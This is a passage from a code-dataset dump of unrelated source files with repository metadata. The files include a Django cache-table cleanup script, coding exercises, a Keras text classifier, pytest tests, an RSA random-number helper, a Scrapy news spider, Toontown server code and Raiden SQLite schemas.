os.environ.setdefault("DJANGO_SETTINGS_MODULE", "opus.settings")
# from opus import settings
# settings.configure(CACHES=settings.CACHES, DATABASES=settings.DATABASES) # include any other settings you might need
django.setup()
# script imports
from os import system
from django.db import transaction, connection, reset_queries
from django.core.management import call_command
from django.db.utils import DatabaseError
from settings import MULT_FIELDS # DATABASES creds only
from secrets import DB_ADMIN, DB_ADMIN_PASS
cursor = connection.cursor()
# forget about it
# from settings_local import opus1, opus_to_deploy # names of the databases
database = 'opus'
# drop cache tables
cursor.execute("show tables in {} like 'cache%'".format(database))
all_cache_tables = [row[0] for row in cursor.fetchall() if row[0]]
for cache_table in all_cache_tables:
q_up = "drop table {}.{}".format(database, cache_table)
cursor.execute(q_up)
print q_up
print "Done!"
|
[
"lballard.cat@gmail.com"
] |
lballard.cat@gmail.com
|
7da477883e2730f6f5c070b0800fb4dc3f8c6687
|
c3a76533d1fbb53f291f49fb95b5e89ed69a75f5
|
/amazon_mianjing/isomorphicString.py
|
19372b8e2e48d6bd81616dac258d4ef20febecc3
|
[] |
no_license
|
jing1988a/python_fb
|
5feb68efd32bd63952b4df0c0cd2e766b83451ea
|
fd310ec0a989e003242f1840230aaac150f006f0
|
refs/heads/master
| 2020-03-28T21:03:19.375549
| 2019-01-31T17:02:17
| 2019-01-31T17:02:17
| 149,125,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
# 给你一个list word 你把所有isomorphic group的word分到一起
# isomorphic string的意思是string a 到string b 里面有每一个char都是one to one relationship
# 比如 aba 和cmc是isomorphic 但是aba 和ccc 就不是
# eg: {abba, cppc, abc, emf, bbbb, m} => {{abba, cppc}, {abc, emf}, {bbbb}, {m}}
import collections
class Problem:
    """Groups words into isomorphism classes.

    Two words are isomorphic when a one-to-one character mapping turns one
    into the other (e.g. 'aba' ~ 'cmc', but 'aba' !~ 'ccc').
    """

    def solve(self, words):
        """Return groups (a dict-values view) of mutually isomorphic words.

        Duplicates in the input are collapsed via set(); case-sensitive.
        """
        buckets = collections.defaultdict(list)
        for word in set(words):
            buckets[self.getPattern(word)].append(word)
        return buckets.values()

    def getPattern(self, w):
        """Return a canonical pattern for w.

        Each distinct character is replaced by a fresh letter in order of
        first appearance, so isomorphic words yield identical patterns.
        """
        unused_letters = list('qwertyuiopasdfghjklzxcvbnm')
        assigned = dict()
        canonical = []
        for ch in w:
            if ch not in assigned:
                assigned[ch] = unused_letters.pop()
            canonical.append(assigned[ch])
        return ''.join(canonical)
# Manual smoke check: expect groups {abba, cppc}, {abc, emf}, {bbbb}, {m}
# (group order may vary since solve() iterates a set).
test=Problem()
print(test.solve(['abba', 'cppc', 'abc', 'emf', 'bbbb', 'm']))
|
[
"jing1988a@gmail.com"
] |
jing1988a@gmail.com
|
7d85cf8e793d99257d0ce79b6ec1c76a761f0006
|
a37b756e34fc39c1237fc68997dbef77df9fa6fc
|
/dacon/1_articles/dacon_classify_articles_1.py
|
e5e5f197a6da6982360718465da885fd45e7c8be
|
[] |
no_license
|
jvd2n/ai-study
|
e20e38493ad295940a3201fc0cc8061ca9052607
|
a82f7c6d89db532f881c76b553b5ab3eea0bdd59
|
refs/heads/main
| 2023-08-06T03:24:39.182686
| 2021-10-06T14:41:01
| 2021-10-06T14:41:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,836
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from icecream import ic
# ---- Data loading -------------------------------------------------------
PATH = './dacon/news/'
train = pd.read_csv(PATH + 'train_data.csv')
test = pd.read_csv(PATH + 'test_data.csv')
submission = pd.read_csv(PATH + 'sample_submission.csv')
ic(train, test, submission)
ic(train.shape, test.shape)  # (45654, 3) (9131, 2)

# Per-title word count, used only for inspection below.
train['doc_len'] = train.title.apply(lambda words: len(words.split()))
ic(train['doc_len'].max())

x_train = np.array([x for x in train['title']])
x_test = np.array([x for x in test['title']])
y_train = np.array([x for x in train['topic_idx']])
ic(x_train, x_test, y_train)
ic(x_train.shape, x_test.shape, y_train.shape) # (45654,) (9131,) (45654,)

print("Article's Max Length: ", max(len(i) for i in x_train)) # 44
print("Article's Avg Length: ", sum(map(len, x_train)) / len(x_train)) # 27.33
# plt.hist([len(s) for s in x_train], bins=50)
# plt.show()

# ---- Preprocessing: tokenize titles, pad to fixed length, one-hot labels
from tensorflow.keras.preprocessing.text import Tokenizer
# token = Tokenizer(num_words=2000)
token = Tokenizer(num_words=2000)
token.fit_on_texts(x_train)
seq_train = token.texts_to_sequences(x_train)
seq_test = token.texts_to_sequences(x_test)
print(len(seq_train), len(seq_test))
ic(seq_train[:10])
ic(np.unique(seq_train))

from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
x_train = pad_sequences(seq_train, padding='pre', maxlen=14)
x_test = pad_sequences(seq_test, padding='pre', maxlen=14)
ic(x_train.shape, x_test.shape) # (45654, 14) (9131, 14)
y_train = to_categorical(y_train)
ic(y_train)
ic(y_train.shape) # (45654, 7)

# ---- Modeling: stacked bidirectional LSTMs over embedded tokens ---------
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Embedding, Bidirectional
from tensorflow.keras.callbacks import EarlyStopping
model = Sequential()
model.add(Embedding(2000, 200, input_length=14))
model.add(Bidirectional(LSTM(units=128, return_sequences=True)))
model.add(Bidirectional(LSTM(units=64, return_sequences=True)))
model.add(Bidirectional(LSTM(units=32)))
model.add(Dense(7, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()

es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=5)
model.fit(x_train, y_train, epochs=50, batch_size=32, validation_split=0.2, callbacks=[es])
y_predict = model.predict(x_test)
ic(y_predict)

# ---- Results: argmax class per row, then write a timestamped submission -
ic(len(y_predict))
topic = []
for i in range(len(y_predict)):
    topic.append(np.argmax(y_predict[i]))  # np.argmax -> index of the maximum value

submission['topic_idx'] = topic
ic(submission.shape)

import datetime
date_time = datetime.datetime.now().strftime("%y%m%d_%H%M")
submission.to_csv(PATH + 'CLSFY_ATC_SUB_1_' + date_time + '.csv', index=False)
|
[
"juhnmayer@gmail.com"
] |
juhnmayer@gmail.com
|
049a63b08359ef20611b5bbed9f50e22220ea117
|
bbc8192636e0f254ffcb0537306a5bf387235aec
|
/p2/src/test/test_fixtest.py
|
3286780d878dbc2564ccf50eff4d1557ca0526ce
|
[] |
no_license
|
datason/deployml_course
|
99c0034affb66277fef53aca1f903ae93ad3fc12
|
f2817115063bae714b02b16bf2ed64f38f0b99ea
|
refs/heads/main
| 2023-02-06T10:59:57.500638
| 2020-12-30T09:27:04
| 2020-12-30T09:27:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
# up to parent
import sys, os
PACKAGE_PARENT = '../..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
CURROOT = os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
import numpy as np
import pandas as pd
import joblib
from src.main.preprocessors import *
from config.config import *
import pytest
# fixture - creates a special object for use in the tests
@pytest.fixture
def params():
    """Hyper-parameter dict for constructing the RFModel under test."""
    N_ESTIMATORS = 32
    MAX_DEPTH = 12
    MIN_SAMPLES_LEAF = 3
    CRITERION = 'mse'
    return({"n_estimators" : N_ESTIMATORS,
            "max_depth" : MAX_DEPTH,
            "min_samples_leaf" : MIN_SAMPLES_LEAF,
            "criterion" : CRITERION,
            "random_state" : SEED})
@pytest.fixture
def simulated_data():
    """Small generated dataframe used as both train and test data."""
    # could pin the expected result instead of the input data
    # example: a saved predict() result
    # NOTE(review): `dp` is computed but never used — likely leftover from a
    # version that read the data from disk.
    dp = r'%s' % os.path.abspath(os.path.join(os.path.dirname("src"), os.pardir, os.pardir, 'data')).replace('\\', '/')
    return generate_test_df(DATA_PATH, CLEAN_DATA, 5)
def test_fit(simulated_data, params):
    """Model fits on the simulated data and predicts without raising."""
    rfm = RFModel(**params)
    data_train = simulated_data
    data_test1 = simulated_data
    #data_test2 = simulated_data
    rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
    # alternatively use pandas.testing.assert_frame_equal
    # NOTE(review): this compares predict() with itself on the same frame, so
    # it only checks determinism, not prediction quality.
    assert np.allclose(rfm.predict(data_test1[MODEL_FEATURES]), rfm.predict(data_test1[MODEL_FEATURES]), rtol= 0.1)
    #assert np.allclose(rfm.predict(data_test2[MODEL_FEATURES]), data_test2[TARGET_NAME], rtol= 0.1)
def test_checkfail(simulated_data, params):
    """fit() raises TypeError when the target is passed as one joined string."""
    rfm = RFModel(**params)
    data_train = simulated_data
    # Did not raise
    #with pytest.raises(ValueError):
    #    rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
    with pytest.raises(TypeError):
        rfm.fit(data_train[MODEL_FEATURES], ",".join(data_train[TARGET_NAME]))
|
[
"artseleznev@gmail.com"
] |
artseleznev@gmail.com
|
95cfc91c55e0f76e5468b436c73920eda466e577
|
ab7d6793c9b00b00eae63533bbeffa45a710f690
|
/models/HCN.py
|
7fed678e3d62e686d23a10570581cab5a6e55ec1
|
[] |
no_license
|
subburajs/SLR-1
|
c327090256b267b1877854ee01172fc956946876
|
2fc724303dd530ff46085ae89471f958470e3e14
|
refs/heads/master
| 2023-03-19T21:56:14.061002
| 2020-06-21T16:09:07
| 2020-06-21T16:09:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,307
|
py
|
import torch
import torch.nn as nn
import torchvision
from torchvision import models
from torch.nn import functional as F
class hcn(nn.Module):
    """Hierarchical Co-occurrence Network for skeleton sequences.

    Two parallel conv streams — raw joint coordinates and frame-to-frame
    motion — are processed identically, concatenated, convolved further and
    classified into `num_class` categories.

    NOTE(review): input is assumed to be (N, T, J, D) = (batch, frames,
    joints, coordinate channels), per the comment in get_feature — confirm
    against the data loader.
    """
    def __init__(self,num_class, in_channel=2,
                 length=32,
                 num_joint=10,
                 dropout=0.2):
        super(hcn, self).__init__()
        self.num_class = num_class
        self.in_channel = in_channel
        self.length = length
        self.num_joint = num_joint

        # ---- coordinate stream ----
        self.conv1 = nn.Sequential(
            nn.Conv2d(in_channel,64,1,1,padding=0),
            nn.ReLU()
        )
        # self.bn1 = nn.BatchNorm2d(64)
        # (3,1) kernel: convolve along time only, per joint.
        self.conv2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
        # self.bn2 = nn.BatchNorm2d(32)
        self.hconv = HierarchyConv()
        self.conv4 = nn.Sequential(
            nn.Conv2d(32,64,3,1,padding=1),
            nn.Dropout2d(p=dropout),
            nn.MaxPool2d(2)
        )
        # self.bn4 = nn.BatchNorm2d(64)

        # ---- motion stream (mirrors the coordinate stream) ----
        self.convm1 = nn.Sequential(
            nn.Conv2d(in_channel,64,1,1,padding=0),
            nn.ReLU()
        )
        # self.bnm1 = nn.BatchNorm2d(64)
        self.convm2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
        # self.bnm2 = nn.BatchNorm2d(32)
        self.hconvm = HierarchyConv()
        self.convm4 = nn.Sequential(
            nn.Conv2d(32,64,3,1,padding=1),
            nn.Dropout2d(p=dropout),
            nn.MaxPool2d(2)
        )
        # self.bnm4 = nn.BatchNorm2d(64)

        # ---- fused trunk ----
        self.conv5 = nn.Sequential(
            nn.Conv2d(128,128,3,1,padding=1),
            nn.ReLU(),
            nn.Dropout2d(p=dropout),
            nn.MaxPool2d(2)
        )
        # self.bn5 = nn.BatchNorm2d(128)
        self.conv6 = nn.Sequential(
            nn.Conv2d(128,256,3,1,padding=1),
            nn.ReLU(),
            nn.Dropout2d(p=dropout),
            nn.MaxPool2d(2)
        )
        # self.bn6 = nn.BatchNorm2d(256)

        # scale related to total number of maxpool layer
        scale = 16
        self.fc7 = nn.Sequential(
            nn.Linear(256*(length//scale)*(32//scale),256),
            nn.ReLU(),
            nn.Dropout2d(p=dropout)
        )
        self.fc8 = nn.Linear(256,self.num_class)

    def forward(self,input):
        """Feature extraction followed by classification; returns logits."""
        output = self.get_feature(input)
        output = self.classify(output)
        return output

    def get_feature(self,input):
        """Run both streams over the input and return the fused feature map."""
        # input: N T J D
        input = input.permute(0,3,1,2)
        N, D, T, J = input.size()
        # Frame-to-frame difference, upsampled back to T frames.
        # NOTE(review): F.upsample is deprecated in newer torch versions
        # (F.interpolate is the replacement) — left unchanged here.
        motion = input[:,:,1::,:]-input[:,:,0:-1,:]
        motion = F.upsample(motion,size=(T,J),mode='bilinear').contiguous()

        # Coordinate stream.
        out = self.conv1(input)
        # out = self.bn1(out)
        out = self.conv2(out)
        # out = self.bn2(out)
        out = out.permute(0,3,2,1).contiguous()
        # out: N J T D
        # out = self.conv3(out)
        out = self.hconv(out)
        out = self.conv4(out)
        # out = self.bn4(out)

        # Motion stream.
        outm = self.convm1(motion)
        # outm = self.bnm1(outm)
        outm = self.convm2(outm)
        # outm = self.bnm2(outm)
        outm = outm.permute(0,3,2,1).contiguous()
        # outm: N J T D
        # outm = self.convm3(outm)
        outm = self.hconvm(outm)
        outm = self.convm4(outm)
        # outm = self.bnm4(outm)

        # Fuse the two streams along the channel axis.
        out = torch.cat((out,outm),dim=1)
        out = self.conv5(out)
        # out = self.bn5(out)
        out = self.conv6(out)
        # out = self.bn6(out)
        # out: N J T(T/16) D
        return out

    def classify(self,input):
        """Flatten the feature map and apply the two fully-connected layers."""
        out = input.view(input.size(0),-1)
        out = self.fc7(out)
        out = self.fc8(out)

        # Sanity checks on the logits before returning them.
        t = out
        assert not ((t != t).any())# find out nan in tensor
        assert not (t.abs().sum() == 0) # find out 0 tensor
        # N x C (num_class)
        return out
class HierarchyConv(nn.Module):
    """Convolves body-part groups (arms, hands, face) separately, then fuses.

    Expects input of shape N J T D (joints on dim 1, per the "out: N J T D"
    comment in hcn.get_feature). NOTE(review): the hard-coded joint slices
    below appear to follow an OpenPose-style keypoint layout (body 0-24,
    face 25-94, hands 95-136) — confirm against the dataset's joint order.
    """
    def __init__(self):
        super(HierarchyConv,self).__init__()
        # Per-part convolutions: arms (2 joints each), hands (21 each), face (70).
        self.convla = nn.Conv2d(2,16,3,1,padding=1)
        self.convra = nn.Conv2d(2,16,3,1,padding=1)
        self.conflh = nn.Conv2d(21,16,3,1,padding=1)
        self.confrh = nn.Conv2d(21,16,3,1,padding=1)
        self.convf = nn.Conv2d(70,32,3,1,padding=1)
        # Arm + hand features are concatenated per side before these convs.
        self.convl = nn.Conv2d(32,32,3,1,padding=1)
        self.convr = nn.Conv2d(32,32,3,1,padding=1)
        # Number of fused parts: left side, right side, face.
        self.parts = 3
        self.conv = nn.Sequential(
            nn.Conv2d(self.parts*32,32,3,1,padding=1),
            nn.MaxPool2d(2)
        )
        # self.bn = nn.BatchNorm2d(32)

    def forward(self,input):
        """Slice the joint axis into parts, convolve each, and fuse."""
        left_arm = input[:,[3,4],:,:]
        right_arm = input[:,[6,7],:,:]
        face = input[:,25:95,:,:]
        left_hand = input[:,95:116,:,:]
        right_hand = input[:,116:137,:,:]
        # Alternative (previous?) joint layout kept for reference:
        # left_arm = input[:,[0,1],:,:]
        # right_arm = input[:,[2,3],:,:]
        # face = input[:,4:74,:,:]
        # left_hand = input[:,74:95,:,:]
        # right_hand = input[:,95:116,:,:]
        l1 = self.convla(left_arm)
        r1 = self.convra(right_arm)
        l2 = self.conflh(left_hand)
        r2 = self.confrh(right_hand)
        # Merge arm and hand features per side.
        l = torch.cat([l1,l2],1)
        r = torch.cat([r1,r2],1)
        l = self.convl(l)
        r = self.convr(r)
        f = self.convf(face)
        # Fuse left, right and face, then pool.
        out = torch.cat([l,r,f],1)
        out = self.conv(out)
        # out = self.bn(out)
        return out
|
[
"lwj19970331@gmail.com"
] |
lwj19970331@gmail.com
|
9fbb8d857ef7cc14b89be917d6cb223e5b2d5dc8
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/5FoNY2Z7B5wSCDTA4_0.py
|
fc139177107dd49dad4a420b77ec06ab6021e1c7
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
"""
**Mubashir** needs your help to find out next happy year.
A **Happy Year** is the year with only _distinct digits_. Create a function
that takes an integer `year` and returns the **next happy year**.
### Examples
happy_year(2017) ➞ 2018
# 2018 has all distinct digits
happy_year(1990) ➞ 2013
happy_year(2021) ➞ 2031
### Notes
N/A
"""
def happy_year(year):
    """Return the first year strictly after *year* whose digits are all distinct.

    BUGFIX: the original compared against a hard-coded 4, which (a) loops
    forever / misbehaves past 9876 (the largest 4-digit year with distinct
    digits) and (b) would accept a 5-digit year with a repeated digit as long
    as it had exactly 4 distinct ones. Comparing against the year's own digit
    count is correct for any number of digits and unchanged for 4-digit input.
    """
    year += 1
    while len(set(str(year))) != len(str(year)):
        year += 1
    return year
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
6bfec8c1fcbb786162593abf6d669f571b7c851e
|
275a96a33ae1f89e7b2ee0ecdbac7d78abe6d6cc
|
/test/test_user_with_balance_result.py
|
72c8b77ba889ac3b0da96b18a24fc46de2b8a7de
|
[] |
no_license
|
cascadiarc/cyclos-python-client
|
8029ce07174f2fe92350a92dda9a60976b2bb6c2
|
a2e22a30e22944587293d51be2b8268bce808d70
|
refs/heads/main
| 2023-04-03T16:52:01.618444
| 2021-04-04T00:00:52
| 2021-04-04T00:00:52
| 354,419,532
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
# coding: utf-8
"""
Cyclos 4.11.5 API
The REST API for Cyclos 4.11.5 # noqa: E501
OpenAPI spec version: 4.11.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.user_with_balance_result import UserWithBalanceResult # noqa: E501
from swagger_client.rest import ApiException
class TestUserWithBalanceResult(unittest.TestCase):
    """UserWithBalanceResult unit test stubs (generated by swagger-codegen)."""

    def setUp(self):
        # No shared fixtures needed for this generated stub.
        pass

    def tearDown(self):
        pass

    def testUserWithBalanceResult(self):
        """Test UserWithBalanceResult"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.user_with_balance_result.UserWithBalanceResult()  # noqa: E501
        pass
|
[
"dan@leftcoastfs.com"
] |
dan@leftcoastfs.com
|
6ac2e4e4004008a5b2623b6c78287deb51703b8f
|
bbeba16730eca05a897e46e771b8e9dc2a61e044
|
/testflows/_core/contrib/rsa/randnum.py
|
aad03fac065e68575ca88525fb786438bdd31ccc
|
[
"Apache-2.0"
] |
permissive
|
testflows/TestFlows-Core
|
47d3e5b8890fcf73024c91f4ea293363c29f422b
|
7dd2d3af19f6930257bd53133286edb78bf490ab
|
refs/heads/master
| 2023-08-16T15:42:08.888323
| 2023-08-15T11:35:09
| 2023-08-15T11:35:09
| 215,418,320
| 5
| 4
|
NOASSERTION
| 2023-04-26T19:28:55
| 2019-10-15T23:59:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,695
|
py
|
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for generating random numbers."""
# Source inspired by code by Yesudeep Mangalapilly <yesudeep@gmail.com>
import os
import struct
from .common import bit_size as get_bit_size
from .transform import bytes2int
def read_random_bits(nbits: int) -> bytes:
    """Reads 'nbits' random bits.

    If nbits isn't a whole number of bytes, an extra byte will be appended with
    only the lower bits set.
    """
    whole_bytes, leftover_bits = divmod(nbits, 8)

    # Whole bytes come straight from the OS CSPRNG.
    result = os.urandom(whole_bytes)

    # A partial byte is drawn separately and shifted so only the low
    # `leftover_bits` bits can be set, then prepended to the output.
    if leftover_bits > 0:
        partial = ord(os.urandom(1)) >> (8 - leftover_bits)
        result = struct.pack("B", partial) + result

    return result
def read_random_int(nbits: int) -> int:
    """Reads a random integer of approximately nbits bits.

    The top bit is forced to 1 so the result always occupies the full nbits.
    """
    randomdata = read_random_bits(nbits)
    value = bytes2int(randomdata)

    # Ensure that the number is large enough to just fill out the required
    # number of bits.
    value |= 1 << (nbits - 1)

    return value
def read_random_odd_int(nbits: int) -> int:
    """Reads a random odd integer of approximately nbits bits.

    >>> read_random_odd_int(512) & 1
    1
    """
    value = read_random_int(nbits)

    # Make sure it's odd by forcing the lowest bit to 1.
    return value | 1
def randint(maxvalue: int) -> int:
    """Returns a random integer x with 1 <= x <= maxvalue

    Uses rejection sampling: draw a full-width random integer and retry until
    it falls within range.

    May take a very long time in specific situations. If maxvalue needs N bits
    to store, the closer maxvalue is to (2 ** N) - 1, the faster this function
    is.
    """
    bit_size = get_bit_size(maxvalue)

    tries = 0
    while True:
        value = read_random_int(bit_size)
        if value <= maxvalue:
            break

        if tries % 10 == 0 and tries:
            # After a lot of tries to get the right number of bits but still
            # smaller than maxvalue, decrease the number of bits by 1. That'll
            # dramatically increase the chances to get a large enough number.
            bit_size -= 1
        tries += 1

    return value
|
[
"vzakaznikov@protonmail.com"
] |
vzakaznikov@protonmail.com
|
32efb664104158f736b734dd02cffd81d7c62d5f
|
8cfdba6dd2804e2c3e3faed0c47640f347b14414
|
/utils/util.py
|
4bca3bba741b252dee48d19f96f64b8b9842e9ac
|
[] |
no_license
|
DiegoDigo/tochegando
|
07c4368842897d80df57545a93bf182203724b04
|
36ac3b7109a60a4998b283c54d85d80b8c8e535e
|
refs/heads/master
| 2023-05-28T08:49:43.564907
| 2017-11-27T19:28:06
| 2017-11-27T19:28:06
| 108,421,683
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
from datetime import datetime
def verificar_idade(datanasc: datetime, hoje: datetime = None):
    """Return the age in completed years for birth date *datanasc*.

    BUGFIX: the original returned the plain year difference only when the
    birth month equaled the current month, and otherwise subtracted one —
    under-counting by a year for everyone whose birthday month had already
    passed, and ignoring the day of the month entirely.

    :param datanasc: birth date
    :param hoje: reference date; defaults to today (new optional parameter,
        backward-compatible — existing one-argument callers are unaffected)
    """
    if hoje is None:
        hoje = datetime.today()
    idade = hoje.year - datanasc.year
    # One year less if the birthday has not yet occurred this year.
    if (hoje.month, hoje.day) < (datanasc.month, datanasc.day):
        idade -= 1
    return idade
|
[
"di3g0d0ming05@gmail.com"
] |
di3g0d0ming05@gmail.com
|
a9b5c37d490d72e9375bcbdc7923a7dac1af0d0c
|
01ac9e40052a468dd472a296df0003c4e629e2c9
|
/news_all/spiders_old/tsw_all.py
|
c97cd4d9b74d039fbc585c3c4ee884ec2f287e8e
|
[] |
no_license
|
Pintrue/news_all
|
b5cee16584ed92e6574edd825b574214df65d917
|
eb8c32c79bdacd8e2f76b88f27871c3cd0118006
|
refs/heads/master
| 2022-03-23T13:34:10.354029
| 2019-11-22T07:40:50
| 2019-11-22T07:40:50
| 223,058,997
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,710
|
py
|
# -*- coding: utf-8 -*-
from datetime import datetime
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import Rule
from news_all.spider_models import NewsRCSpider
import re
class TswSpider(NewsRCSpider):
    """Tianshan Net (news.ts.cn) news spider."""
    name = 'tsw'
    # Start URL -> numeric source/category id.
    mystart_urls = {
        'http://news.ts.cn/tp/index.shtml': 1301253,  # Tianshan Net: news center - photo news - left-side list
    }

    rules = (
        # e.g. http://news.ts.cn/system/2019/06/03/035719250.shtml
        # Only follows article URLs from the current year/month.
        Rule(LinkExtractor(allow=(r'news.ts.cn.*?/%s/\d{2}/\d+.shtml' % datetime.today().strftime('%Y/%m'), ),
                           ), callback='parse_item',
             follow=False),
    )

    def parse_item(self, response):
        """Extract title, publish time, source name and cleaned content from an article page."""
        xp = response.xpath
        try:
            title = xp("//h1[@class='active-title']/text()").extract_first()
            source = xp("//p[@class='active-info2']")[0]
            content_div = xp("//div[@class='hy-active']")[0]
            # Publish date in the "YYYY年MM月DD日" form found in the info line.
            pubtime = source.re(r'\d{2,4}年\d{1,2}月\d{1,2}日')[0]
            # pubtime = xp("//div[@class='Remark']/span/text()").extract_first().split('|')[0]
            # Origin/source name follows the "来源:" ("source:") label.
            origin_name_div =xp('//p[@class="active-info2"]/text()').extract_first('')
            origin_name = re.findall(".*来源:(.*).*", origin_name_div)[0]
        except:
            # Any xpath/regex miss is reported as a debug item instead of
            # crashing the crawl.
            return self.produce_debugitem(response, "xpath error")
        content, media, _, _ = self.content_clean(content_div)
        return self.produce_item(
            response=response,
            title=title,
            # self.get_page_title(response).split('_')[0]
            pubtime=pubtime,
            origin_name=origin_name,
            content=content,
            media=media
        )
|
[
"py416@ic.ac.uk"
] |
py416@ic.ac.uk
|
70797a92621d0c27c582ee280246e49b977d773d
|
8f5c1ad76f3f9aa67d6720154b4884c9fab2ecbc
|
/toontown/hood/DGHoodAI.py
|
e4f84d08dd39839a3336652b6e2f10b55714760e
|
[] |
no_license
|
RegDogg/ttr-2014-dev
|
eb0d9da3e91b9504b83804c27e1a00d87a0b7220
|
8a392ea4697cf15bd83accd01dcf26d0f87557eb
|
refs/heads/master
| 2023-07-13T02:40:56.171517
| 2021-07-12T00:31:28
| 2021-07-12T00:31:28
| 372,103,145
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,132
|
py
|
from toontown.toonbase import ToontownGlobals
from toontown.safezone.DistributedDGFlowerAI import DistributedDGFlowerAI
from SZHoodAI import SZHoodAI
from toontown.toon import NPCToons
from toontown.safezone import ButterflyGlobals
from toontown.safezone.DistributedButterflyAI import DistributedButterflyAI
class DGHoodAI(SZHoodAI):
    """Server-side (AI) controller for the Daisy Gardens neighborhood."""
    HOOD = ToontownGlobals.DaisyGardens

    def createZone(self):
        # Base class performs the generic safezone setup first.
        SZHoodAI.createZone(self)
        self.butterflies = []
        self.spawnObjects()
        # The distributed big flower object unique to Daisy Gardens.
        self.flower = DistributedDGFlowerAI(self.air)
        self.flower.generateWithRequired(self.HOOD)
        self.createButterflies()

    def createButterflies(self):
        """Spawn the configured number of butterflies in every DG butterfly area."""
        playground = ButterflyGlobals.DG
        for area in range(ButterflyGlobals.NUM_BUTTERFLY_AREAS[playground]):
            for b in range(ButterflyGlobals.NUM_BUTTERFLIES[playground]):
                butterfly = DistributedButterflyAI(self.air)
                butterfly.setArea(playground, area)
                butterfly.setState(0, 0, 0, 1, 1)
                butterfly.generateWithRequired(self.HOOD)
                self.butterflies.append(butterfly)
|
[
"regdogg.acr@gmail.com"
] |
regdogg.acr@gmail.com
|
af25fa5ee55d2f7965a59473f1165b20d44c87ed
|
9c4f3a2d6d95f2f9a96d4a33f258c9dbbd73bbb3
|
/raiden/storage/utils.py
|
0ef042bd43e5384ae288246965fb7494900f8dcb
|
[
"MIT"
] |
permissive
|
copra2005/raiden
|
b70d4a9c20fca19bc984aa7546da3b54ff22eea7
|
2afd6a0039107bb9bbe1d619b9ebfedc1373b566
|
refs/heads/master
| 2020-03-28T05:11:21.533314
| 2018-09-06T14:12:51
| 2018-09-06T20:53:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 989
|
py
|
DB_CREATE_SETTINGS = '''
CREATE TABLE IF NOT EXISTS settings (
name VARCHAR[24] NOT NULL PRIMARY KEY,
value TEXT
);
'''
DB_CREATE_STATE_CHANGES = '''
CREATE TABLE IF NOT EXISTS state_changes (
identifier INTEGER PRIMARY KEY AUTOINCREMENT,
data BINARY
);
'''
DB_CREATE_SNAPSHOT = '''
CREATE TABLE IF NOT EXISTS state_snapshot (
identifier INTEGER PRIMARY KEY,
statechange_id INTEGER,
data BINARY,
FOREIGN KEY(statechange_id) REFERENCES state_changes(identifier)
);
'''
DB_CREATE_STATE_EVENTS = '''
CREATE TABLE IF NOT EXISTS state_events (
identifier INTEGER PRIMARY KEY,
source_statechange_id INTEGER NOT NULL,
data BINARY,
FOREIGN KEY(source_statechange_id) REFERENCES state_changes(identifier)
);
'''
DB_SCRIPT_CREATE_TABLES = """
PRAGMA foreign_keys=off;
BEGIN TRANSACTION;
{}{}{}{}
COMMIT;
PRAGMA foreign_keys=on;
""".format(
DB_CREATE_SETTINGS,
DB_CREATE_STATE_CHANGES,
DB_CREATE_SNAPSHOT,
DB_CREATE_STATE_EVENTS,
)
|
[
"lefteris@refu.co"
] |
lefteris@refu.co
|
ec41eba4d760cb80e779607fef62ddb85cf78059
|
e7b7505c084e2c2608cbda472bc193d4a0153248
|
/LeetcodeNew/Tree/LC_124_Binary_Tree_Maximum_Path_Sum.py
|
6a10be30d8460e31e6ec0ca49ac7de282569f3cf
|
[] |
no_license
|
Taoge123/OptimizedLeetcode
|
8e5c1cd07904dfce1248bc3e3f960d2f48057a5d
|
3e50f6a936b98ad75c47d7c1719e69163c648235
|
refs/heads/master
| 2023-02-27T21:13:40.450089
| 2023-02-07T04:11:09
| 2023-02-07T04:11:09
| 170,044,224
